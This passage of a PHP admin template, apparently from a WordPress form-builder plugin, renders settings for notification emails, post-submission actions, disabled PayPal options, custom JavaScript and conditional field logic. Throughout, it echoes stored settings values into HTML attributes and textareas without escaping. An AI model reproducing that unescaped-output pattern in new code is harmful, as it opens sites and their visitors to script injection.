							</tr>
							<tr valign="top">
								<td class="fm_options_label" style="vertical-align: middle;">
									<label> Email empty fields: </label>
								</td>
								<td class="fm_options_value">
									<button class="fm-checkbox-radio-button <?php echo $row->mail_emptyfields == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="fm_change_radio(this); return false;" value="<?php echo $row->mail_emptyfields; ?>">
										<span></span>
									</button>
									<input type="hidden" name="mail_emptyfields" value="<?php echo $row->mail_emptyfields; ?>"/>
								</td>
							</tr>
							<tr>
								<td class="fm_options_label" valign="top">
									<label>Custom Text in Email For Administrator</label>
								</td>
								<td class="fm_options_value">
									<div style="margin-bottom:5px">
										<?php
										$choise = "document.getElementById('script_mail')";
										for ($i = 0; $i < count($label_label); $i++) {
											if ($label_type[$i]=="type_submit_reset" || $label_type[$i]=="type_editor" || $label_type[$i]=="type_map" || $label_type[$i]=="type_mark_map" || $label_type[$i]=="type_captcha"|| $label_type[$i]=="type_recaptcha" || $label_type[$i]=="type_button"  || $label_type[$i]=="type_send_copy")
											continue;
											
											$param = htmlspecialchars(addslashes($label_label[$i]));
											$fld_label = $param;
											if(strlen($fld_label)>30) {
												$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
												$fld_label = explode("\n", $fld_label);
												$fld_label = $fld_label[0] . ' ...';	
											}
														
											if($label_type[$i]=="type_file_upload")
												$fld_label .= '(as image)';
											?>
											<input style="border: 1px solid silver; font-size: 10px;" type="button" value="<?php echo $fld_label; ?>" onClick="insertAtCursor(<?php echo $choise; ?>, '<?php echo $param; ?>')" />
											<?php
										}
										?>
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Submission ID" onClick="insertAtCursor(<?php echo $choise; ?>,'subid')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Ip" onClick="insertAtCursor(<?php echo $choise; ?>,'ip')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Username" onClick="insertAtCursor(<?php echo $choise; ?>,'username')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="User Email" onClick="insertAtCursor(<?php echo $choise; ?>,'useremail')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="All fields list" onClick="insertAtCursor(<?php echo $choise; ?>, 'all')" />
									</div>
									<?php
									if (user_can_richedit()) {
										wp_editor($row->script_mail, 'script_mail', array('teeny' => FALSE, 'textarea_name' => 'script_mail', 'media_buttons' => FALSE, 'textarea_rows' => 5));
									}
									else {
										?>
										<textarea name="script_mail" id="script_mail" cols="20" rows="10" style="width:300px; height:450px;"><?php echo $row->script_mail; ?></textarea>
										<?php
									}
									?>
								</td>
							</tr>
						</table>
					</fieldset>
					<fieldset class="fm_mail_options">
						<legend>Email to User</legend>
						<table class="admintable">
							<tr valign="top">
								<td class="fm_options_label">
									<label for="mail">Send to</label>
								</td>
								<td class="fm_options_value">
									<?php 
										$fields = explode('*:*id*:*type_submitter_mail*:*type*:*', $row->form_fields);
										$fields_count = count($fields);
										if ($fields_count == 1) { ?>
											There is no email field
											<?php
										}
										else {
											for ($i = 0; $i < $fields_count - 1; $i++) {
												?>
												<div>
													<input type="checkbox" name="send_to<?php echo $i; ?>" id="send_to<?php echo $i; ?>" value="<?php echo (strlen($fields[$i])!=1 ? substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*')+15, strlen($fields[$i])) : $fields[$i]); ?>"  <?php echo (is_numeric(strpos($row->send_to, '*'.(strlen($fields[$i])!=1 ? substr($fields[$i], strrpos($fields[$i], '*:*new_field*:*')+15, strlen($fields[$i])) : $fields[$i]).'*')) ? 'checked="checked"' : '' ); ?> style="margin: 0px 5px 0px 0px;" />
													<label for="send_to<?php echo $i; ?>"><?php echo substr($fields[$i + 1], 0, strpos($fields[$i + 1], '*:*w_field_label*:*')); ?></label>
												</div>
												<?php
											}
										}
									?>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="mail_from_user">Email From</label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_from_user" name="mail_from_user" value="<?php echo $row->mail_from_user; ?>" style="width: 250px;" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="mail_from_name_user">From Name</label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_from_name_user" name="mail_from_name_user" value="<?php echo $row->mail_from_name_user; ?>" style="width: 250px;"/>
									<img src="<?php echo WD_FMC_URL . '/images/add.png?ver='. get_option("wd_form_maker_version").''; ?>" onclick="document.getElementById('mail_from_name_user_labels').style.display='block';" style="vertical-align: middle;cursor: pointer; display:inline-block; margin:0px; float:none;">
									<?php 
									$choise = "document.getElementById('mail_from_name_user')";
									echo '<div style="position:relative; top:-3px;"><div id="mail_from_name_user_labels" class="email_labels" style="display:none;">';							
									for($i=0; $i<count($label_label); $i++)	{ 			
										if($label_type[$i]=="type_submit_reset" || $label_type[$i]=="type_editor" || $label_type[$i]=="type_map" || $label_type[$i]=="type_mark_map" || $label_type[$i]=="type_captcha"|| $label_type[$i]=="type_recaptcha" || $label_type[$i]=="type_button" || $label_type[$i]=="type_file_upload" || $label_type[$i]=="type_send_copy")			
											continue;		
								  
										$param = htmlspecialchars(addslashes($label_label[$i]));			
										$fld_label = $param;
										if(strlen($fld_label)>30) {
											$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
											$fld_label = explode("\n", $fld_label);
											$fld_label = $fld_label[0] . ' ...';	
										}
								
										echo "<a onClick=\"insertAtCursor(".$choise.",'".$param."'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">".$fld_label."</a>";	
									}
									echo "<a onClick=\"insertAtCursor(".$choise.",'subid'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Submission ID</a>";	
									echo "<a onClick=\"insertAtCursor(".$choise.",'username'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Username</a>";
									echo '</div></div>';								
								?>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label for="reply_to_user">Reply to<br />(if different from "Email Form")</label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="reply_to_user" name="reply_to_user" value="<?php echo $row->reply_to_user; ?>" style="width:250px;"/>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label> CC: </label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_cc_user" name="mail_cc_user" value="<?php echo $row->mail_cc_user ?>" style="width:250px;" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label> BCC: </label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_bcc_user" name="mail_bcc_user" value="<?php echo $row->mail_bcc_user ?>" style="width:250px;" />
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label">
									<label> Subject: </label>
								</td>
								<td class="fm_options_value">
									<input type="text" id="mail_subject_user" name="mail_subject_user" value="<?php echo $row->mail_subject_user ?>" style="width:250px;" />
									<img src="<?php echo WD_FMC_URL . '/images/add.png?ver='. get_option("wd_form_maker_version").''; ?>" onclick="document.getElementById('mail_subject_user_labels').style.display='block';" style="vertical-align: middle; cursor: pointer; display:inline-block; margin:0px; float:none;">
									<?php 
									$choise = "document.getElementById('mail_subject_user')";
									echo '<div style="position:relative; top:-3px;"><div id="mail_subject_user_labels" class="email_labels" style="display:none;">';							
									for($i=0; $i<count($label_label); $i++)			
									{ 			
										if($label_type[$i]=="type_submit_reset" || $label_type[$i]=="type_editor" || $label_type[$i]=="type_map" || $label_type[$i]=="type_mark_map" || $label_type[$i]=="type_captcha"|| $label_type[$i]=="type_recaptcha" || $label_type[$i]=="type_button" || $label_type[$i]=="type_file_upload" || $label_type[$i]=="type_send_copy")			
										continue;		
										
										$param = htmlspecialchars(addslashes($label_label[$i]));			
										
										$fld_label = $param;
										if(strlen($fld_label)>30)
										{
											$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
											$fld_label = explode("\n", $fld_label);
											$fld_label = $fld_label[0] . ' ...';	
										}
									
										echo "<a onClick=\"insertAtCursor(".$choise.",'".$param."'); document.getElementById('mail_subject_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">".$fld_label."</a>";	

									}
									echo "<a onClick=\"insertAtCursor(".$choise.",'subid'); document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Submission ID</a>";	

									echo "<a onClick=\"insertAtCursor(".$choise.",'username'); 			document.getElementById('mail_from_name_user_labels').style.display='none';\" style=\"display:block; text-decoration:none;\">Username</a>";
									echo '</div></div>';								
									?>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label" style="vertical-align: middle;">
									<label> Mode: </label>
								</td>
								<td class="fm_options_value">
									<button name="mail_mode_user" class="fm-checkbox-radio-button <?php echo $row->mail_mode_user == 1 ? 'fm-text-yes' : 'fm-text-no' ?> medium" onclick="fm_change_radio_checkbox_text(this); return false;" value="<?php echo $row->mail_mode_user == 1 ? '1' : '0' ?>">
										<label><?php echo $row->mail_mode_user == 1 ? 'HTML' : 'Text' ?></label>
										<span></span>
									</button>
									<input type="hidden" name="mail_mode_user" value="<?php echo $row->mail_mode_user; ?>"/>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label" style="vertical-align: middle;">
									<label> Attach File: </label>
								</td>
								<td class="fm_options_value">
									<div class="error_fm" style="padding: 5px; font-size: 14px;">File attach is disabled in free version.</div>
									<input type="hidden" name="mail_attachment_user" value="<?php echo $row->mail_attachment_user; ?>"/>
								</td>
							</tr>
							<tr valign="top">
								<td class="fm_options_label" style="vertical-align: middle;">
									<label> Email verification: </label>
								</td>
								<td class="fm_options_value">
									<button name="mail_verify" class="fm-checkbox-radio-button <?php echo $row->mail_verify == 1 ? 'fm-yes' : 'fm-no' ?>" onclick="fm_change_radio(this); return false;" value="<?php echo $row->mail_verify; ?>">
										<span></span>
									</button>
									<input type="hidden" name="mail_verify" value="<?php echo $row->mail_verify; ?>"/>
								</td>
							</tr>
							<tr valign="top" class="expire_link" <?php echo ($row->mail_verify==0 ? 'style="display:none;"' : '')?>>
								<td class="fm_options_label" valign="top">
									<label> Verification link expires in: </label>
								</td>
								<td class="fm_options_value">
									<input class="inputbox" type="text" name="mail_verify_expiretime" maxlength="10"  value = "<?php echo ($row->mail_verify_expiretime ? $row->mail_verify_expiretime : 0); ?>" style="width:95px;" onkeypress="return check_isnum_point(event)"/><small> -- hours (0 - never expires).</small>
								</td>
							</tr>
							<tr>
								<td class="fm_options_label" valign="top">
									<label>Custom Text in Email For User</label>
								</td>
								<td class="fm_options_value">
									<div style="margin-bottom:5px">
										<?php
										$choise = "document.getElementById('script_mail_user')";
										for ($i = 0; $i < count($label_label); $i++) {
											if ($label_type[$i] == "type_submit_reset" || $label_type[$i] == "type_editor" || $label_type[$i] == "type_map" || $label_type[$i] == "type_mark_map" || $label_type[$i] == "type_captcha" || $label_type[$i] == "type_recaptcha" || $label_type[$i] == "type_button" || $label_type[$i] == "type_file_upload" || $label_type[$i] == "type_send_copy") 
											continue;
											
											$param = htmlspecialchars(addslashes($label_label[$i]));
											$fld_label = $param;
											if(strlen($fld_label)>30) {
												$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
												$fld_label = explode("\n", $fld_label);
												$fld_label = $fld_label[0] . ' ...';	
											}
											if($label_type[$i]=="type_file_upload")
												$fld_label .= '(as image)';
											?>
											<input style="border: 1px solid silver; font-size: 10px;" type="button" value="<?php echo $fld_label; ?>" onClick="insertAtCursor(<?php echo $choise; ?>, '<?php echo $param; ?>')" />
											<?php
										}
										?>
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Submission ID" onClick="insertAtCursor(<?php echo $choise; ?>,'subid')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Ip" onClick="insertAtCursor(<?php echo $choise; ?>,'ip')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Username" onClick="insertAtCursor(<?php echo $choise; ?>,'username')" />
										<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="User Email" onClick="insertAtCursor(<?php echo $choise; ?>,'useremail')" />
										<input style="border: 1px solid silver; font-size: 10px; margin:3px;" type="button" value="All fields list" onClick="insertAtCursor(<?php echo $choise; ?>, 'all')" />
										<div class="verification_div" <?php echo ($row->mail_verify==0 ? 'style="display:none;"' : '')?>><input style="border: 1px solid silver; font-size: 10px; margin:3px;" type="button" value="Verification link" onClick="insertAtCursor(<?php echo $choise; ?>,'Verification link')" /> </div>
									</div>
									<?php
									if (user_can_richedit()) {
										wp_editor($row->script_mail_user, 'script_mail_user', array('teeny' => FALSE, 'textarea_name' => 'script_mail_user', 'media_buttons' => FALSE, 'textarea_rows' => 5));
									}
									else {
										?>
										<textarea name="script_mail_user" id="script_mail_user" cols="20" rows="10" style="width:300px; height:450px;"><?php echo $row->script_mail_user; ?></textarea>
										<?php
									}
									?>
								</td>
							</tr>
						</table>
					</fieldset>
				</fieldset>
				<fieldset id="actions_fieldset" class="adminform fm_fieldset_deactive">
					<legend>Actions after submission</legend>
					<table class="admintable">
						<tr valign="top">
							<td class="fm_options_label">
								<label>Action type</label>
							</td>
							<td class="fm_options_value">
								<div>
									<input type="radio" name="submit_text_type" id="text_type_none" onclick="set_type('none')" value="1" <?php echo ($row->submit_text_type != 2 && $row->submit_text_type != 3 && $row->submit_text_type != 4 && $row->submit_text_type != 5) ? "checked" : ""; ?> />
									<label for="text_type_none">Stay on Form</label>
								</div>
								<div>
									<input type="radio" name="submit_text_type" id="text_type_post" onclick="set_type('post')" value="2" <?php echo ($row->submit_text_type == 2) ? "checked" : ""; ?> />
									<label for="text_type_post">Post</label>
								</div>
								<div>
									<input type="radio" name="submit_text_type" id="text_type_page" onclick="set_type('page')" value="5" <?php echo ($row->submit_text_type == 5) ? "checked" : ""; ?> />
									<label for="text_type_page">Page</label>
								</div>
								<div>
									<input type="radio" name="submit_text_type" id="text_type_custom_text" onclick="set_type('custom_text')" value="3" <?php echo ($row->submit_text_type == 3 ) ? "checked" : ""; ?> />
									<label for="text_type_custom_text">Custom Text</label>
								</div>
								<div>
									<input type="radio" name="submit_text_type" id="text_type_url" onclick="set_type('url')" value="4" <?php echo ($row->submit_text_type == 4) ? "checked" : ""; ?> />
									<label for="text_type_url">URL</label>
								</div>
							</td>
						</tr>
						<tr id="none" <?php echo (($row->submit_text_type == 2 || $row->submit_text_type == 3 || $row->submit_text_type == 4 || $row->submit_text_type == 5) ? 'style="display:none"' : ''); ?>>
							<td class="fm_options_label">
								<label>Stay on Form</label>
							</td>
							<td class="fm_options_value">
								<img src="<?php echo WD_FMC_URL . '/images/verified.png'; ?>" border="0">
							</td>
						</tr>
						<tr id="post" <?php echo (($row->submit_text_type != 2) ? 'style="display:none"' : ''); ?>>
							<td class="fm_options_label">
								<label for="post_name">Post</label>
							</td>
							<td class="fm_options_value">
								<select id="post_name" name="post_name">
									<option value="0">- Select Post -</option>
									<?php
									$args = array('posts_per_page'  => 10000);
									query_posts($args);
									while (have_posts()) : the_post(); ?>
									<option value="<?php $x = get_permalink(get_the_ID()); echo $x; ?>" <?php echo (($row->article_id == $x) ? 'selected="selected"' : ''); ?>><?php the_title(); ?></option>
									<?php
									endwhile;
									wp_reset_query();
									?>
								</select>
							</td>
						</tr>
						<tr id="page" <?php echo (($row->submit_text_type != 5) ? 'style="display:none"' : ''); ?>>
							<td class="fm_options_label">
								<label for="page_name">Page</label>
							</td>
							<td class="fm_options_value">
								<select id="page_name" name="page_name">
									<option value="0">- Select Page -</option>
									<?php
									$pages = get_pages();
									foreach ($pages as $page) {
										$page_id = get_page_link($page->ID);
										?>
										<option value="<?php echo $page_id; ?>" <?php echo (($row->article_id == $page_id) ? 'selected="selected"' : ''); ?>><?php echo $page->post_title; ?></option>
										<?php
									}
									wp_reset_query();
									?>
								</select>
							</td>
						</tr>
						<tr id="custom_text" <?php echo (($row->submit_text_type != 3) ? 'style="display: none;"' : ''); ?>>
							<td class="fm_options_label">
								<label for="submit_text">Text</label>
							</td>
							<td class="fm_options_value">
								<?php $choise = "document.getElementById('submit_text')"; 
								for ($i = 0; $i < count($label_label); $i++) {
									if ($label_type[$i]=="type_submit_reset" || $label_type[$i]=="type_editor" || $label_type[$i]=="type_map" || $label_type[$i]=="type_mark_map" || $label_type[$i]=="type_captcha"|| $label_type[$i]=="type_recaptcha" || $label_type[$i]=="type_button"  || $label_type[$i]=="type_send_copy" || $label_type[$i]=="type_file_upload")
									  continue;
									
									$param = htmlspecialchars(addslashes($label_label[$i]));
									$fld_label = $param;
									if(strlen($fld_label)>30) {
										$fld_label = wordwrap(htmlspecialchars(addslashes($label_label[$i])), 30);
										$fld_label = explode("\n", $fld_label);
										$fld_label = $fld_label[0] . ' ...';	
									}

									?>
									<input style="border: 1px solid silver; font-size: 10px;" type="button" value="<?php echo $fld_label; ?>" onClick="insertAtCursor(<?php echo $choise; ?>, '<?php echo $param; ?>')" />
									<?php
								}
								?>
								<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Submission ID" onClick="insertAtCursor(<?php echo $choise; ?>,'subid')" />
								<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Ip" onClick="insertAtCursor(<?php echo $choise; ?>,'ip')" />
								<input style="border: 1px solid silver; font-size: 10px; margin:3px;" type="button" value="User Id" onClick="insertAtCursor(<?php echo $choise; ?>, 'userid')" />
								<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="Username" onClick="insertAtCursor(<?php echo $choise; ?>,'username')" />
								<input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="User Email" onClick="insertAtCursor(<?php echo $choise; ?>,'useremail')" />
								<?php
								if (user_can_richedit()) {
									wp_editor($row->submit_text, 'submit_text', array('teeny' => FALSE, 'textarea_name' => 'submit_text', 'media_buttons' => FALSE, 'textarea_rows' => 5));
								}
									else {
										?>
										<textarea cols="36" rows="5" id="submit_text" name="submit_text" style="resize: vertical;">
											<?php echo $row->submit_text; ?>
										</textarea>
										<?php
									}
									?>
								</td>
							</tr>
						<tr id="url" <?php echo (($row->submit_text_type != 4 ) ? 'style="display:none"' : ''); ?>>
							<td class="fm_options_label">
								<label for="url">URL</label>
							</td>
							<td class="fm_options_value">
								<input type="text" id="url" name="url" style="width:300px" value="<?php echo $row->url; ?>" />
							</td>
						</tr>
					</table>
				</fieldset>
				<fieldset id="payment_fieldset" class="adminform fm_fieldset_deactive">
					<legend>Payment Options</legend>
					<table class="admintable">
						<tr>
							<td colspan="2">
								<div class="error_fm" style="padding: 5px; font-size: 14px;">Paypal Options are disabled in free version.</div>
							</td>
						</tr>
						<tr valign="top">
							<td class="fm_options_label">
								<label>Turn Paypal On</label>
							</td>
							<td class="fm_options_value">
								<button name="paypal_mode" class="fm-checkbox-radio-button <?php echo $row->paypal_mode == 1 ? 'fm-text-yes' : 'fm-text-no' ?> small" onclick="fm_change_radio_checkbox_text(this); return false;" value="<?php echo $row->paypal_mode == 1 ? '1' : '0' ?>" disabled="disabled">
									<label><?php echo $row->paypal_mode == 1 ? 'On' : 'Off' ?></label>
									<span></span>
								</button>
								<input type="hidden" name="paypal_mode" value="<?php echo $row->paypal_mode; ?>"/>
							</td>
						</tr>
						<tr valign="top">
							<td class="fm_options_label">
								<label>Checkout Mode</label>
							</td>
							<td class="fm_options_value">
								<button name="checkout_mode" class="fm-checkbox-radio-button <?php echo $row->checkout_mode == 1 ? 'fm-text-yes' : 'fm-text-no' ?> large" onclick="fm_change_radio_checkbox_text(this); return false;" value="<?php echo $row->checkout_mode == 1 ? '1' : '0' ?>" disabled="disabled">
									<label><?php echo $row->checkout_mode == 1 ? 'Production' : 'Testmode' ?></label>
									<span></span>
								</button>
								<input type="hidden" name="checkout_mode" value="<?php echo $row->checkout_mode; ?>"/>
							</td>
						</tr>
						<tr valign="top">
							<td class="fm_options_label">
								<label for="paypal_email">Paypal email</label>
							</td>
							<td class="fm_options_value">
								<input type="text" name="paypal_email" id="paypal_email" value="<?php echo $row->paypal_email; ?>" class="text_area" style="width:250px" disabled="disabled">
							</td>
						</tr>
						<tr valign="top">
							<td class="fm_options_label">
								<label for="payment_currency">Payment Currency</label>
							</td>
							<td class="fm_options_value">
								<select id="payment_currency" name="payment_currency" disabled="disabled">
									<option value="USD" <?php echo (($row->payment_currency == 'USD') ? 'selected' : ''); ?>>$ &#8226; U.S. Dollar</option>
									<option value="EUR" <?php echo (($row->payment_currency == 'EUR') ? 'selected' : ''); ?>>&#8364; &#8226; Euro</option>
									<option value="GBP" <?php echo (($row->payment_currency == 'GBP') ? 'selected' : ''); ?>>&#163; &#8226; Pound Sterling</option>
									<option value="JPY" <?php echo (($row->payment_currency == 'JPY') ? 'selected' : ''); ?>>&#165; &#8226; Japanese Yen</option>
									<option value="CAD" <?php echo (($row->payment_currency == 'CAD') ? 'selected' : ''); ?>>C$ &#8226; Canadian Dollar</option>
									<option value="MXN" <?php echo (($row->payment_currency == 'MXN') ? 'selected' : ''); ?>>Mex$ &#8226; Mexican Peso</option>
									<option value="HKD" <?php echo (($row->payment_currency == 'HKD') ? 'selected' : ''); ?>>HK$ &#8226; Hong Kong Dollar</option>
									<option value="HUF" <?php echo (($row->payment_currency == 'HUF') ? 'selected' : ''); ?>>Ft &#8226; Hungarian Forint</option>
									<option value="NOK" <?php echo (($row->payment_currency == 'NOK') ? 'selected' : ''); ?>>kr &#8226; Norwegian Kroner</option>
									<option value="NZD" <?php echo (($row->payment_currency == 'NZD') ? 'selected' : ''); ?>>NZ$ &#8226; New Zealand Dollar</option>
									<option value="SGD" <?php echo (($row->payment_currency == 'SGD') ? 'selected' : ''); ?>>S$ &#8226; Singapore Dollar</option>
									<option value="SEK" <?php echo (($row->payment_currency == 'SEK') ? 'selected' : ''); ?>>kr &#8226; Swedish Kronor</option>
									<option value="PLN" <?php echo (($row->payment_currency == 'PLN') ? 'selected' : ''); ?>>zl &#8226; Polish Zloty</option>
									<option value="AUD" <?php echo (($row->payment_currency == 'AUD') ? 'selected' : ''); ?>>A$ &#8226; Australian Dollar</option>
									<option value="DKK" <?php echo (($row->payment_currency == 'DKK') ? 'selected' : ''); ?>>kr &#8226; Danish Kroner</option>
									<option value="CHF" <?php echo (($row->payment_currency == 'CHF') ? 'selected' : ''); ?>>CHF &#8226; Swiss Francs</option>
									<option value="CZK" <?php echo (($row->payment_currency == 'CZK') ? 'selected' : ''); ?>>Kc &#8226; Czech Koruny</option>
									<option value="ILS" <?php echo (($row->payment_currency == 'ILS') ? 'selected' : ''); ?>>&#8362; &#8226; Israeli Sheqel</option>
									<option value="BRL" <?php echo (($row->payment_currency == 'BRL') ? 'selected' : ''); ?>>R$ &#8226; Brazilian Real</option>
									<option value="TWD" <?php echo (($row->payment_currency == 'TWD') ? 'selected' : ''); ?>>NT$ &#8226; Taiwan New Dollars</option>
									<option value="MYR" <?php echo (($row->payment_currency == 'MYR') ? 'selected' : ''); ?>>RM &#8226; Malaysian Ringgit</option>
									<option value="PHP" <?php echo (($row->payment_currency == 'PHP') ? 'selected' : ''); ?>>&#8369; &#8226; Philippine Peso</option>
									<option value="THB" <?php echo (($row->payment_currency == 'THB') ? 'selected' : ''); ?>>&#xe3f; &#8226; Thai Bahtv</option>
								</select>
							</td>
						</tr>
						<tr valign="top">
							<td class="fm_options_label">
								<label for="tax">Tax</label>
							</td>
							<td class="fm_options_value">
								<input type="text" name="tax" id="tax" value="<?php echo $row->tax; ?>" class="text_area" style="width: 40px;" onKeyPress="return check_isnum_point(event)" disabled="disabled"> %
							</td>
						</tr>
					</table>
				</fieldset>
				<fieldset id="javascript_fieldset" class="adminform fm_fieldset_deactive">
					<legend>JavaScript</legend>
					<table class="admintable">
						<tr valign="top">
							<td class="fm_options_label">
								<label for="javascript">Javascript</label>
							</td>
							<td class="fm_options_value" style="width:650px;">
								<textarea style="margin: 0px; height: 400px; width: 600px;" cols="60" rows="30" name="javascript" id="form_javascript"><?php echo $row->javascript; ?></textarea>
							</td>
						</tr>
					</table>
				</fieldset>
				<fieldset id="conditions_fieldset" class="adminform fm_fieldset_deactive">
					<?php 	
					$ids = array();
					$types = array();
					$labels = array();
					$paramss = array();
					$all_ids = array();
					$all_labels = array();

					$select_and_input = array("type_text", "type_password", "type_textarea", "type_name", "type_number", "type_phone", "type_submitter_mail", "type_address", "type_spinner", "type_checkbox", "type_radio", "type_own_select", "type_paypal_price", "type_paypal_select", "type_paypal_checkbox", "type_paypal_radio", "type_paypal_shipping");
					$select_type_fields = array("type_address", "type_checkbox", "type_radio", "type_own_select", "type_paypal_select", "type_paypal_checkbox", "type_paypal_radio", "type_paypal_shipping");
		
					$fields=explode('*:*new_field*:*',$row->form_fields);
					$fields 	= array_slice($fields,0, count($fields)-1);   
					foreach($fields as $field) {
						$temp=explode('*:*id*:*',$field);
						array_push($ids, $temp[0]);
						array_push($all_ids, $temp[0]);
						$temp=explode('*:*type*:*',$temp[1]);
						array_push($types, $temp[0]);
						$temp=explode('*:*w_field_label*:*',$temp[1]);
						array_push($labels, $temp[0]);
						array_push($all_labels, $temp[0]);
						array_push($paramss, $temp[1]);

					}
					
					foreach($types as $key=>$value){
						if(!in_array($types[$key],$select_and_input)){					
							unset($ids[$key]);						
							unset($labels[$key]);					
							unset($types[$key]);
							unset($paramss[$key]);					
						}
					}	

					$ids = array_values($ids);
					$labels = array_values($labels);
					$types = array_values($types);
					$paramss = array_values($paramss);
					
					$chose_ids = implode('@@**@@',$ids);
					$chose_labels = implode('@@**@@',$labels);
					$chose_types = implode('@@**@@',$types);
					$chose_paramss = implode('@@**@@',$paramss);
						
					$all_ids_cond = implode('@@**@@',$all_ids);
					$all_labels_cond = implode('@@**@@',$all_labels);

					$show_hide	= array();
					$field_label	= array();
					$all_any 	= array();
					$condition_params 	= array();
		
					$count_of_conditions=0;
					if($row->condition!="") {
						$conditions=explode('*:*new_condition*:*',$row->condition);
						$conditions 	= array_slice($conditions,0, count($conditions)-1); 
						$count_of_conditions = count($conditions);					

						foreach($conditions as $condition) {
							$temp=explode('*:*show_hide*:*',$condition);
							array_push($show_hide, $temp[0]);
							$temp=explode('*:*field_label*:*',$temp[1]);
							array_push($field_label, $temp[0]);
							$temp=explode('*:*all_any*:*',$temp[1]);
							array_push($all_any, $temp[0]);
							array_push($condition_params, $temp[1]);
						}
					}
					else {
						$show_hide[0]=1;
						$all_any[0]='and';
						$condition_params[0]='';
						if($all_ids)
						$field_label[0] = $all_ids[0];
					}
					?>
					<div>
						<button class="fm-button add-button large" onclick="add_condition('<?php echo $chose_ids; ?>', '<?php echo htmlspecialchars(addslashes($chose_labels)); ?>', '<?php echo $chose_types; ?>', '<?php echo htmlspecialchars(addslashes($chose_paramss)); ?>', '<?php echo $all_ids_cond; ?>', '<?php echo htmlspecialchars(addslashes($all_labels_cond)); ?>'); return false;">
							Add Condition
							<span></span>
						</button>
					</div>
						<?php
						for($k=0; $k<$count_of_conditions; $k++) {	
							if(in_array($field_label[$k],$all_ids)) : ?>
								<div id="condition<?php echo $k; ?>" class="fm-condition">
									<div id="conditional_fileds<?php echo $k; ?>">
										<select id="show_hide<?php echo $k; ?>" name="show_hide<?php echo $k; ?>" style="width:80px; ">
											<option value="1" <?php if($show_hide[$k]==1) echo 'selected="selected"'; ?>>show</option>
											<option value="0" <?php if($show_hide[$k]==0) echo 'selected="selected"'; ?>>hide</option>
										</select> 
										<select id="fields<?php echo $k; ?>" name="fields<?php echo $k; ?>" style="width:300px; " onChange="" >
											<?php 
											foreach($all_labels as $key => $value) { 	
												if($field_label[$k]==$all_ids[$key])
													$selected = 'selected="selected"';
												else
													$selected ='';
												echo '<option value="'.$all_ids[$key].'" '.$selected.'>'.$value.'</option>';
											}
											?>
										</select> 
										<span>if</span>
										<select id="all_any<?php echo $k; ?>" name="all_any<?php echo $k; ?>" style="width:60px; ">
											<option value="and" <?php if($all_any[$k]=="and") echo 'selected="selected"'; ?>>all</option>
											<option value="or" <?php if($all_any[$k]=="or") echo 'selected="selected"'; ?>>any</option>
										</select> 
										<span>of the following match:</span>	
										<img src="<?php echo WD_FMC_URL . '/images/add.png?ver='. get_option("wd_form_maker_version").''; ?>" title="add" onclick="add_condition_fields(<?php echo $k; ?>,'<?php echo $chose_ids; ?>', '<?php echo htmlspecialchars(addslashes($chose_labels)); ?>', '<?php echo $chose_types; ?>', '<?php echo htmlspecialchars(addslashes($chose_paramss)); ?>')" style="cursor: pointer; vertical-align: middle;">
										<img src="<?php echo WD_FMC_URL . '/images/page_delete.png?ver='. get_option("wd_form_maker_version").''; ?>" onclick="delete_condition('<?php echo $k; ?>')" style="cursor: pointer; vertical-align: middle;">
									</div>
								<?php 
								if($condition_params[$k]) {
									$_params = explode('*:*next_condition*:*',$condition_params[$k]);
									$_params = array_slice($_params,0, count($_params)-1); 
								
										foreach($_params as $key=>$_param) {
											$key_select_or_input ='';
											$param_values = explode('***',$_param);
											$multiselect = explode('@@@',$param_values[2]);
										
											if(in_array($param_values[0],$ids)): ?>
											<div id="condition_div<?php echo $k; ?>_<?php echo $key; ?>">
											<select id="field_labels<?php echo $k; ?>_<?php echo $key; ?>" onchange="change_choices(this.options[this.selectedIndex].id+'_<?php echo $key; ?>','<?php echo $chose_ids; ?>', '<?php echo $chose_types; ?>', '<?php echo htmlspecialchars(addslashes($chose_paramss)); ?>')" style="width:300px;"/>
												<?php 
												foreach($labels as $key1 => $value) 		
												{ 		
													if($param_values[0]==$ids[$key1])
													{
														$selected = 'selected="selected"';
